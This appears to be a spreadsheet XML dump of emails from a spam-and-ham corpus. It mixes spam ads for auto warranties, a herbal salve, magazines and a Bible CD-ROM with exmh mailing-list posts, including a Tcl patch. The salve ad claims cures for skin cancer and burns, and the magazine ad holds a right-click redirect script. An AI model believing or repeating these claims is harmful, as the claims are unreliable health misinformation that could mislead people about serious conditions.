 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Extended Auto Warranties Here                                                   ldiop
</t>
  </si>
  <si>
    <t xml:space="preserve">Protect your financial well-being.
  Purchase an Extended Auto Warranty for your Car today. CLICK HERE for a FREE no obligation quote.
  http://www.takemetothesavings.com/warranty/
  Car troubles always seem to happen at the worst possible time. Protect yourself and your family with a quality Extended Warranty for your car, truck, or SUV, so that a large expense cannot hit you all at once. We cover most vehicles with less than 150,000 miles.
  Buy DIRECT! Our prices are 40-60% LESS!
  We offer fair prices and prompt, toll-free claims service.  Get an Extended Warranty on your car today.
  Warranty plan also includes:
  1)   24-Hour Roadside Assistance.
  2)   Rental Benefit.
  3)   Trip Interruption Intervention.
  4)   Extended Towing Benefit.
  CLICK HERE for a FREE no obligation quote.
  http://www.takemetothesavings.com/warranty/
  ---------------------------------------
  To unsubscribe, go to: 
  http://www.takemetothesavings.com/stopthemailplease/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Relief for all skin disorders
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;BODY&gt;
 &lt;META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html;charset=3Diso-8859-=
 1"&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1=
 "&gt;
 &lt;META content=3D"MSHTML 5.50.4134.600" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;
 &lt;DIV&gt;&amp;nbsp; 
 &lt;META content=3D"MSHTML 5.50.4134.600" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;FONT size=3D2&gt;
 &lt;P align=3Dcenter&gt;&lt;FONT face=3D"Times New Roman"&gt;&lt;FONT size=3D5&gt;&lt;EM&gt;Chickw=
 eed Healing 
 Salve &lt;/EM&gt;&lt;FONT size=3D3&gt;&lt;/P&gt;
 &lt;DIV align=3Dcenter&gt;"A Natural Way To Healthy Skin"&lt;/DIV&gt;
 &lt;DIV align=3Dcenter&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT size=3D2&gt;&lt;EM&gt;A h=
 ealing 
 salve for skin problems such as...&lt;/EM&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=3Dcenter&gt;&lt;FONT size=3D2&gt;&lt;EM&gt;* Psoriasis&amp;nbsp;&amp;nbsp;&amp;nbsp; 
 &amp;nbsp;&amp;nbsp;&amp;nbsp; * Skin Cancer&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; * 
 Rashes&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; * Sore Throats&lt;/EM&gt;&lt;/FONT&gt;&lt;/DI=
 V&gt;
 &lt;DIV align=3Dcenter&gt;&lt;EM&gt;&lt;FONT size=3D2&gt;* 
 Cuts&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbs=
 p;&amp;nbsp;&amp;nbsp;&amp;nbsp;* 
 Burns&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;*Hemorrhoids&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;* P=
 oison 
 Ivy&amp;nbsp;&amp;nbsp;&amp;nbsp; * Colds&lt;/FONT&gt;&lt;/EM&gt;&lt;/DIV&gt;
 &lt;DIV align=3Dcenter&gt;&lt;EM&gt;&lt;FONT size=3D2&gt;* Diaper Rash&amp;nbsp;&amp;nbsp;&amp;nbsp; * E=
 xcema, and 
 more!&lt;/FONT&gt;&lt;/EM&gt;&lt;/DIV&gt;
 &lt;DIV align=3Dcenter&gt;&lt;EM&gt;&lt;FONT size=3D2&gt;&lt;/FONT&gt;&lt;/EM&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV align=3Dleft&gt;&lt;STRONG&gt;GOOD FOR ALL SKIN DISORDERS&lt;/STRONG&gt; &lt;FONT 
 size=3D3&gt;&lt;BR&gt;&lt;BR&gt;&lt;I&gt;All Natural Salve, Made by Cold Infusion&lt;/I&gt; &lt;BR&gt;&lt;FONT=
 size=3D2&gt;&lt;I&gt;Ingredients: Chickweed, Comfrey, Mint, Olive Oil, Beeswax, Lav=
 ender, 
 Rosemary and Eucalyptus.&lt;/I&gt; &lt;FONT size=3D3&gt;&lt;BR&gt;&lt;BR&gt;&lt;B&gt;Testimonial:&lt;/B&gt; &lt;I=
 &gt;I had a 
 skin cancer on my right leg about the size of a dime. It had grown very fa=
 st and 
 was infected. With daily use of&lt;/I&gt; &lt;B&gt;Chickweed Healing Salve&lt;/B&gt; &lt;I&gt;the =
 whole 
 thing disappeared with 2 weeks without leaving a scar. - Sheila Holbrook, =
 &lt;/I&gt; &lt;BR&gt;&lt;B&gt;Testimonial: &lt;/B&gt;&lt;I&gt;My newly born baby, now one month 
 old, had chronic diaper rash. Several doctors had tried to get it to go 
 away...nothing seemed to work, she continued to be raw and sore. She cried=
  all 
 the time. I tried your &lt;B&gt;Chickweed Healing&lt;/B&gt; Salve, putting it on that =
 night. 
 By the next morning she was much better. After using it for 2 days, she wa=
 s 
 completely cured. She is now a beautiful baby. She doesn't cry anymore. I =
 paid 
 $19.95 for it, however I would gladly have paid $100. Thanks so much. I wi=
 ll 
 always keep it on hand. I will gladly give your product a good reference i=
 f 
 anyone wants to give me a call. Shellie Cooper Stanly, KS &lt;/I&gt; 
 &lt;BR&gt;&lt;B&gt;Testimonial:&lt;/B&gt; &lt;I&gt;I had these dark spots on my leg for 15 years. =
 I'm 
 not sure what it was but it was growing! After two months of using the 
 &lt;/I&gt;&lt;B&gt;Chickweed Healing Salve &lt;/B&gt;&lt;EM&gt;the spots are almost gone. I also u=
 se it 
 for dry skin on my heels and toes. Its amazing stuff! Kirk B. &lt;/EM&gt; 
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=3Dleft&gt;&lt;FONT size=3D3&gt;&lt;FONT size=3D2&gt;&lt;FONT size=3D3&gt;&lt;B&gt;Testimon=
 ial:&lt;/B&gt; &lt;I&gt;I 
 had a rash under my arm for 9 months. I tried a lot of salves and lotions =
 but 
 nothing worked until I tried&lt;/I&gt; &lt;B&gt;Chickweed Healing Salve&lt;/B&gt;&lt;I&gt; . I app=
 lied 
 it 2 times a day and it went away within one month. I also had some spots =
 on my 
 face. Within 3 and 1/2 weeks they were all gone. Steve Burington 
 &lt;/I&gt; &lt;BR&gt;&lt;B&gt;Testimonial:&lt;/B&gt;&lt;I&gt;I 
 burned myself real bad across the chest, arms, and hands. I started using&lt;=
 /I&gt;&lt;B&gt; 
 Chickweed Healing Salve&lt;/B&gt;&lt;I&gt; on my 3rd day in the burn unit at Universit=
 y of 
 Louisville Hospital and had immediate results. The nurses were impressed a=
 t the 
 results, 8 days later I was released. - Charles Mulligan, Athens, 
 TN&lt;/I&gt;&lt;BR&gt;&lt;B&gt;Testimonial:&lt;/B&gt;&lt;I&gt;Does a lot of good for just about anything=
  you 
 use it for. - William Byler, Centerville, PA &lt;/I&gt; &lt;BR&gt;&lt;BR&gt;&lt;EM&gt;If you 
 have a persistent skin problem that just won't go away&amp;nbsp;this may be th=
 e 
 relief you've been looking for. Call us and place your order today! 
 &lt;/EM&gt;281-681-3952&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;One 4-oz tin container $19.95 + FREE S&amp;amp;H 
 &lt;BR&gt;Two 4-oz tin containers $29.95 + FREE S&amp;amp;H &lt;BR&gt;&lt;/DIV&gt;
 &lt;P align=3Dcenter&gt;&lt;/P&gt;
 &lt;DIV align=3Dleft&gt;&lt;BR&gt;Send Check Money order or Credit Card Payment to: 
 &lt;BR&gt;&lt;BR&gt;CHS Laboratory &lt;BR&gt;1007 Whitestone Lane &lt;BR&gt;Houston, TX 77073 
 &lt;BR&gt;&lt;BR&gt;If you would like to place a Credit Card order 
 call:&lt;BR&gt;281-681-3952&lt;BR&gt;&lt;FONT face=3D"MS Sans Serif"&gt;&lt;FONT size=3D2&gt;We ac=
 cept all 
 major credit 
 cards.&lt;BR&gt;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HT=
 ML&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: PATCH (was: Re: Another bug)
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multipart MIME message.
 --==_Exmh_6514812010
 Content-Type: text/plain; charset=us-ascii
 cwg-dated-1027805573.3ce2ae@DeepEddy.Com said:
 &gt; I just checked in a code cleanup which doesn't address this issue,
 &gt; but does  take a machete to code right around it.  You ought to 'cvs
 &gt; update' and see if  your issue becomes any clearer with all the
 &gt; brush removed.
 &gt; My patch notes that 'msgid' and 'line' are redundant with one
 &gt; another and removes  one or the other from functions which takes
 &gt; both.  The callers are then  changed to pass what the function
 &gt; expects.  In the case of Msg_Change, the  'line' argument is removed
 &gt; and we only have the msgid argument.  Ftoc_ClearCurrent is now the
 &gt; first line of MsgChange. 
 The following patch removes Ftoc_RescanLine in favour of a 
 Ftoc_RescanLines. It runs scan(1) on a list of lines and updates ftoc 
 accordingly. The patch also changes all the callers to make use of it.
 It also changes Ftoc_ClearCurrent to work of an argument instead of 
 falsily clearing a message that's still Current on disk. All in an 
 effort to get a one-to-one disk-display correspondence.
 It does add ~30 -- ~ 75 ms (~&lt;10%) to the execution time depending on 
 folder size due to the invocation of scan. However this version does 
 not try to second guess the mh version of scan so if you have exotic 
 scanlines it tells the truth. As a side effect the '+' sign now 
 corresponds better to what's on disk.
 Comments appreciated. I'm going to be offlike for a couple of days, 
 so I send the cvs diff rather than putting it in the cvs.
 /Anders
 --==_Exmh_6514812010
 Content-Type: application/x-patch ; name="exmh.patch"
 Content-Description: exmh.patch
 Content-Disposition: attachment; filename="exmh.patch"
 Index: lib/ftoc.tcl
 ===================================================================
 RCS file: /cvsroot/exmh/exmh/lib/ftoc.tcl,v
 retrieving revision 1.29
 diff -u -b -B -w -p -r1.29 ftoc.tcl
 --- lib/ftoc.tcl	22 Jul 2002 21:46:35 -0000	1.29
 +++ lib/ftoc.tcl	24 Jul 2002 09:16:25 -0000
 @@ -558,7 +558,7 @@ proc FtocPickRange { {addcurrent 0} } {
  	if {$addcurrent} {
  	    Ftoc_RangeHighlight $ftoc(curLine) $ftoc(curLine)
  	}
 -	Ftoc_ClearCurrent
 +	Ftoc_ClearCurrent $ftoc(curLine)
  	Msg_ClearCurrent
  	set ftoc(curLine) {}
      }
 @@ -611,31 +611,55 @@ proc Ftoc_NewFtoc {} {
  # Ftoc_ClearCurrent and Ftoc_Change are two parts of
  # dinking the ftoc display when advancing a message.
 -proc Ftoc_ClearCurrent {} {
 -    # Clear display of current message
 +#
 +# Make line no longer appear as the currently selected line
 +#
 +
 +proc Ftoc_ClearCurrent { line } {
      global ftoc exwin
      set ftoc(pickone) 1
      set ftoc(lineset) {}
 -    if {$ftoc(curLine) == {}} {
 -	set ftoc(curLine) [Mh_Cur $ftoc(folder)]
 -    }
 -    if {$ftoc(curLine) != {}} {
 -	$exwin(ftext) tag remove cur $ftoc(curLine).0 $ftoc(curLine).end
 -	Ftoc_RescanLine $ftoc(curLine)
 -    }
 -    return $ftoc(curLine)
 -}
 -proc Ftoc_Change { line {show show} } {
 +#We dont need this any more since we work off the line 
 +#argument, not $ftoc(curLine)
 +#    if {$ftoc(curLine) == {}} {
 +#      set ftoc(curLine) [Mh_Cur $ftoc(folder)]
 +#    }
 +#    if {$ftoc(curLine) != {}} {
 +#      $exwin(ftext) tag remove cur $ftoc(curLine).0 $ftoc(curLine).end
 +#      Ftoc_RescanLine $ftoc(curLine)
 +#    }
 +     #should check that 0&lt;$line&lt;last line and error otherwise
 +     $exwin(ftext) tag remove cur $line.0 $line.end
 +     Ftoc_RescanLines [list $line]
 +
 +#    return $ftoc(curLine)
 +}
 +
 +#
 +# Make newline the currently selected line
 +# optionally clear oldline from such attribution
 +#
 +proc Ftoc_Change { newline {oldline {}}} {
 +
      global ftoc exwin
 -    set ftoc(curLine) $line
 +
 +    if {![info exists oldline] || ($oldline==$newline)} {
 +       set oldline {}
 +    }
 +    set ftoc(curLine) $newline
      if {$ftoc(curLine) == {}} {
  	set ok 0
      } else {
 -	if {$show == "show"} {
  	    $exwin(ftext) tag remove unseen $ftoc(curLine).0 $ftoc(curLine).end
 +	if {$oldline != {}} {
 +	    set ftoc(pickone) 1
 +	    set ftoc(lineset) {}
 +	    $exwin(ftext) tag remove cur $oldline.0 $oldline.end
 +	    Ftoc_RescanLines [list $ftoc(curLine) $oldline]
 +	} else {
 +	    Ftoc_RescanLines [list $ftoc(curLine)]
  	}
 -	Ftoc_RescanLine $ftoc(curLine) +
  	$exwin(ftext) tag add cur $ftoc(curLine).0 $ftoc(curLine).end
  	set top [$exwin(ftext) index @0,4]
  	if [catch {expr {$top+1}}] {set top 0}	;# trap 100.-1 format, iconic
 @@ -695,7 +720,10 @@ proc Ftoc_MarkSeen { ids } {
  	}
      }
  }
 -proc Ftoc_RescanLine { ix {plus none} } {
 +#
 +# This one is not used any more. Kept here for reference
 +#
 +proc Ftoc_RescanLine_old { ix {plus none} } {
      global exmh exwin ftoc
      if [catch {
  	set text [$exwin(ftext) get ${ix}.0 ${ix}.end]
 @@ -737,6 +765,57 @@ proc Ftoc_RescanLine { ix {plus none} } 
  	Exmh_Error "FtocRescanLine $ix : $msg"
      }
  }
 +
 +
 +#
 +# Rescans a set of lines and updates the ftoc as needed
 +# lines_in: list of line numbers. Ranges (e.g. 200-210) are not allowed
 +#
 +proc Ftoc_RescanLines { lines_in } {
 +    global exmh exwin ftoc mhProfile
 +    
 +    Exmh_Debug Ftoc_RescanLines [ time {
 +       #Sort the lines and weed out duplicates. 
 +       #They creep in when we change folders
 +       #set lastCandidate {}
 +       #foreach newCandidate [lsort -integer $lines_in] {
 +       #    if {$newCandidate != $lastCandidate} {
 +       #       lappend lines $newCandidate
 +       #       Exmh_Debug "** $lines"
 +       #       set lastCandidate $newCandidate
 +       #    }
 +       #}
 +       #Never mind dupechecking. The only potential is checked for in 
 +       #Ftoc_Change and the above takes time (~8 ms)
 +        set lines [lsort -integer $lines_in]
 +
 +       foreach line $lines {
 +           lappend msgnos [Ftoc_MsgNumber $line]
 +       }
 +       set input [open "|$mhProfile(scan-proc) \
 +               [list +$ftoc(folder)] \
 +               [join $msgnos] \
 +               -width $ftoc(scanWidth)"]
 +       set texts [split [string trim [read $input] \n ] \n ]
 +       catch {close $input}
 +       #Exmh_Debug "* lines=$lines\nmsgnos=$msgnos\ntexts=$texts"
 +
 +       set ll [llength $lines]
 +       for {set i 0} {$i&lt;$ll} {incr i} {
 +           set line [lindex $lines $i]
 +           set tags [$exwin(ftext) tag names $line.0]
 +           $exwin(ftext) configure -state normal
 +           $exwin(ftext) delete $line.0 $line.end
 +           $exwin(ftext) insert $line.0 [lindex $texts $i]
 +	   $exwin(ftext) configure -state disabled
 +	   foreach tag $tags {
 +               $exwin(ftext) tag add $tag $line.0 $line.end
 +	   }
 +       }
 +   }
 +   ]
 +}
 +
  proc Ftoc_NextImplied { {show show} {implied implied} } {
      global ftoc
      if {$ftoc(implied) &amp;&amp; $ftoc(direction) == "prev"} {
 @@ -793,7 +872,7 @@ proc Ftoc_NextFolder { {implied no} } {
  	    # If on last message, clear display because the
  	    # message is moved or deleted
  	    if {$ftoc(curLine) != {}} {
 -		Ftoc_ClearCurrent
 +		Ftoc_ClearCurrent $ftoc(curLine)
  		Msg_ClearCurrent
  	    }
  	    Exmh_Status ""
 @@ -809,7 +888,7 @@ proc Ftoc_NextFolder { {implied no} } {
  	    return
  	} else {
  	    set ftoc(softChange) 1
 -	    Ftoc_ClearCurrent
 +	    Ftoc_ClearCurrent $ftoc(curLine)
  	    Msg_ClearCurrent
  	    Exmh_Status ""
  	    Exmh_Status "End of folder; &lt;Next&gt; =&gt; $f" warn
 @@ -1113,7 +1192,7 @@ proc FtocCommit {tagname commitProc {cop
  	    set ftoc(displayDirty) 1
  	    Ftoc_ClearMsgCache
  	    if {$msgid == $curid} {
 -		Ftoc_ClearCurrent
 +		Ftoc_ClearCurrent $ftoc(curLine)
  		Msg_ClearCurrent
  	    }
  	    if {$L == $ftoc(curLine)} {
 Index: lib/msg.tcl
 ===================================================================
 RCS file: /cvsroot/exmh/exmh/lib/msg.tcl,v
 retrieving revision 1.21
 diff -u -b -B -w -p -r1.21 msg.tcl
 --- lib/msg.tcl	22 Jul 2002 21:23:48 -0000	1.21
 +++ lib/msg.tcl	24 Jul 2002 09:16:26 -0000
 @@ -73,10 +73,20 @@ proc Msg_ShowUnseen { {show show} } {
      return 0
  }
  proc Msg_ClearCurrent { } {
 -    global msg exmh
 +    global msg exmh ftoc
 +    # Are there cases where this is not true?
 +    if {$ftoc(folder) == $exmh(folder)} { 
 +        set prevline [Ftoc_FindMsg [Mh_Cur $ftoc(folder)]]
 +        if {$prevline == {}} {
 +            unset prevline
 +        }
 +    }
      set msg(id) {}		;# Clear current message
      set msg(dpy) {}		;# and currently displayed message
      Mh_ClearCur $exmh(folder)
 +    if {[info exists prevline]} {
 +        Ftoc_ClearCurrent $prevline
 +    }
      MsgClear
      Buttons_Current 0
      Uri_ClearCurrent
 @@ -117,13 +127,13 @@ proc Msg_Change {msgid {show show} } {
      Exmh_Debug Msg_Change [time [list MsgChange $msgid $show]]
  }
  proc MsgChange {msgid {show show}} {
 -    global exmh exwin msg mhProfile
 +    global exmh exwin msg mhProfile ftoc
 -    Ftoc_ClearCurrent
 +    set prevline [Ftoc_FindMsg [Mh_Cur $ftoc(folder)]]
      Mh_SetCur $exmh(folder) $msgid
      Ftoc_ShowSequences $exmh(folder)
      set line [Ftoc_FindMsg $msgid]
 -    if {! [Ftoc_Change $line $show]} {
 +    if {! [Ftoc_Change $line $prevline]} {
  	Exmh_Status "Cannot find msg $msgid - Rescan?"
      } else {
  	if {$msg(id) == {}} {
 @@ -652,14 +662,17 @@ proc Msg_UUdecode {} {
  }
  proc Msg_MarkUnseen {} {
 -    global exmh
 +    global exmh ftoc
      Msg_CheckPoint
      Ftoc_Iterate line {
  	set msgid [Ftoc_MsgNumber $line]
  	Mh_MarkUnseen $exmh(folder) $msgid
      }
 -    Msg_ClearCurrent
 -    Ftoc_ClearCurrent
 +    Ftoc_RescanLines $ftoc(lineset)
 +    #Why was this needed?
 +    #Msg_ClearCurrent
 +    #Not needed anymore
 +    #Ftoc_ClearCurrent
      Flist_ForgetUnseen $exmh(folder)
      Ftoc_ShowSequences $exmh(folder)
  }
 Index: lib/scan.tcl
 ===================================================================
 RCS file: /cvsroot/exmh/exmh/lib/scan.tcl,v
 retrieving revision 1.21
 diff -u -b -B -w -p -r1.21 scan.tcl
 --- lib/scan.tcl	22 Jul 2002 22:39:29 -0000	1.21
 +++ lib/scan.tcl	24 Jul 2002 09:16:26 -0000
 @@ -265,7 +265,7 @@ proc Scan_CacheUpdate {} {
  # this thing.
  #
      if !$ftoc(displayValid) {
 -	set curLine [Ftoc_ClearCurrent]			;# Clear +
 +	Ftoc_ClearCurrent $ftoc(curLine)        ;# Clear +
          if [file writable $cacheFile] {
              set scancmd "exec $mhProfile(scan-proc) [list +$folder] \
  		    -width $ftoc(scanWidth) &gt; [list $cacheFile]"
 @@ -273,12 +273,12 @@ proc Scan_CacheUpdate {} {
                  Exmh_Status "failed to rescan folder $folder: $err" warn
              }
          }
 -	Ftoc_Change $curLine	;# Restore it
 +	Ftoc_Change $ftoc(curline)              ;# Restore it
      } elseif [catch {
  	set cacheIO [open $cacheFile w]
 -	set curLine [Ftoc_ClearCurrent]			;# Clear +
 +	Ftoc_ClearCurrent $ftoc(curLine)        ;# Clear +
  	set display [$exwin(ftext) get 1.0 "end -1 char"]
 -	Ftoc_Change $curLine	;# Restore it
 +	Ftoc_Change $ftoc(curline)              ;# Restore it
  	puts $cacheIO $display nonewline
  	close $cacheIO
  	set ftoc(displayDirty) 0
 --==_Exmh_6514812010--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Tom Reingold wrote:
 &gt; &gt; 
 &gt; &gt; Ahh.  At work we fire people who use Outlook (Literally true:
 &gt; &gt; They get escorted to the door, their badge confiscated, and
 &gt; &gt; told to return the next day to collect their office contents).
 &gt; 
 &gt; Why?  What threat does Outlook pose to your organization?
 &gt; 
 It has been described as "the technological equivalent of
 soliciting blood transfusions from random strangers in the
 street".  In short - it's a virus magnet.
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Our magazine promotion
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;bizmagoffer&lt;/TITLE&gt;
 &lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=#FFFFFF&gt;
 &lt;center&gt;
 &lt;TABLE WIDTH=392 BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;
             &lt;h1 align="center"&gt;&lt;b&gt;&lt;font color="#FF0000" face="Verdana"&gt;Knowledge Is Power!&lt;/font&gt;&lt;/b&gt;&lt;/h1&gt;
         &lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;
             &lt;center&gt;&lt;font face="Verdana" color="#0000FF" size="4"&gt;&lt;b&gt;So Get Yours At A Savings Up To 78%&lt;/b&gt;&lt;/font&gt;&lt;/center&gt;
         &lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;
             &lt;center&gt;&lt;font face="Verdana" color="#000000"&gt;&lt;b&gt;On The Top Informative Business Magazines&lt;/b&gt;&lt;/font&gt;&lt;/center&gt;
         &lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;
 			&lt;IMG SRC="http://www.global2000.com/creatives/mag/images/bizmag_02.jpg" WIDTH=392 HEIGHT=137&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;
 			&lt;IMG SRC="http://www.global2000.com/creatives/mag/images/bizmag_03.gif" WIDTH=392 HEIGHT=17&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;
             &lt;p align="center"&gt;&lt;font color="#FF0000" face="Verdana" size="4"&gt;&lt;b&gt;&amp;nbsp;
             Any
             3 Magazine $50&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/b&gt;&lt;/font&gt;&lt;a href="http://www.wwwmagazine.com/buy3" target="_blank"&gt;&lt;font color="#FF0000" face="Verdana" size="2"&gt;DETAILS&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
         &lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;
             &lt;p align="center"&gt;&lt;b&gt;&lt;font color="#0000FF" size="2" face="Verdana"&gt;Small Price To
             Pay For The Business Edge&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;
 			&lt;IMG SRC="http://www.global2000.com/creatives/mag/images/bizmag_06.jpg" WIDTH=392 HEIGHT=133&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;
 			&lt;IMG SRC="http://www.global2000.com/creatives/mag/images/bizmag_07.jpg" WIDTH=392 HEIGHT=18&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD ROWSPAN=2 WIDTH=319 HEIGHT=32&gt;
             &lt;p align="center"&gt;&lt;font color="#FF0000" face="Verdana" size="4"&gt;&lt;b&gt;&amp;nbsp;
             All
             6 Magazine $99 &lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;/TD&gt;
 		&lt;TD&gt;
             &lt;font face="Verdana" size="2" color="#FF0000"&gt;&lt;a href="http://www.wwwmagazine.com/buy3" target="_blank"&gt;DETAILS&lt;/a&gt;&lt;/font&gt;&lt;/TD&gt;
 		&lt;TD ROWSPAN=2&gt;
             &lt;font face="Verdana" size="2"&gt;
 			&lt;IMG SRC="http://www.global2000.com/creatives/mag/images/bizmag_10.jpg" WIDTH=29 HEIGHT=32&gt;&lt;/font&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
             &lt;font face="Verdana" size="2"&gt;
 			&lt;IMG SRC="http://www.global2000.com/creatives/mag/images/bizmag_11.jpg" WIDTH=44 HEIGHT=4&gt;&lt;/font&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;
 			&lt;IMG SRC="http://www.global2000.com/creatives/mag/images/bizmag_12.gif" width=392 height=23&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;
 			&lt;IMG SRC="http://www.global2000.com/creatives/mag/images/bizmag_13.gif" width=392 height=100&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;
             &lt;p align="center"&gt;&lt;font face="Verdana" size="1"&gt;An Enormous Selection of
         Magazines to choose from...&lt;br&gt;
         Always a deal... in addition to our daily specials come&lt;br&gt;
         check us out at&lt;/font&gt;&lt;font face="Verdana" size="2"&gt;  &lt;a href="http://wwwmagazine.com" target="_blank"&gt;&lt;b&gt;www.wwwmagazine.com&lt;/b&gt;&lt;/a&gt;.&lt;/font&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;
         &lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;&lt;div align="center"&gt;&lt;br&gt;
   &lt;br&gt;
   &lt;a href="#" onClick=self.close()&gt;&lt;font face="Arial"size=-1"&gt;Click here to close 
   this window&lt;/font&gt;&lt;/a&gt; 
   &lt;script  language="JavaScript"&gt;
                                               &lt;!--
                                             if (navigator.appName == 'Microsoft Internet Explorer' &amp;&amp; parseInt(navigator.appVersion) &gt;= 4)
                                 {
                                               function click() {
                                               if (event.button==2) {
                                               open("http://www.pointcom.com","_top");}
                                               }
                                               document.onmousedown=click
                                 }
                                               // --&gt;
  &lt;/script&gt;
 &lt;/div&gt;
 &lt;center&gt;
     &lt;font face="Times New Roman, Times, serif" size="2"&gt;Note: this is not a spam 
     email. This email was sent to you because your email was entered in on a website 
     &lt;br&gt;
     requesting to be a registered subscriber. If you would would like to be removed 
     from our list,&lt;br&gt;
 &lt;a href="mailto:abuse@global2000.com"&gt;abuse@global2000.com&lt;/a&gt;&lt;br&gt;&lt;font color="#999999"&gt;CLICK 
   HERE&lt;/font&gt; TO CANCEL YOUR ACCOUNT and you will *never* receive another 
   email from us! &lt;/font&gt; 
 &lt;/center&gt;
         &lt;/TD&gt;
 	&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/center&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: V2.4 keeps incorrectly blue-ing folders
</t>
  </si>
  <si>
    <t xml:space="preserve">Exmh keeps turning the folder indicator blue for one folder, and I've read all the messages in the folder.  Driving me nuts.  I've packed the folder, I've deleted the .mh_sequences file there, keeps doing it.  Help!  
 I've just recently started using 2.4 (was using 2.2), so perhaps there are things that needed to be deleted/changed in my settings?
 --Harlan
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: THE BIBLE ON CD-ROM ..1948
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Dear Friend:
 Find solutions to all your daily problems and life's challenges at the click of a mouse button?
 We have the answers you're looking for on The Word Bible CD-ROM it is one of the most powerful, life-changing tools available today and it's easy to use.
 On one CD, (Windows or Macintosh versions) you have a complete library of Bibles, well known reference books and study tools. You can view several Bible versions simultaneously, make personal notes, print scriptures and search by word, phrase or topic.
 The Word Bible CD offers are simply amazing.
 The wide range of resources on the CD are valued at over $1,500 if purchased separately.
 ** 14 English Bible Versions
 ** 32 Foreign Language Versions
 ** 9 Original Language Versions
 ** Homeschool Resource Index
 ** 17 Notes &amp; Commentaries
 ** Colorful Maps, Illustrations, &amp; Graphs
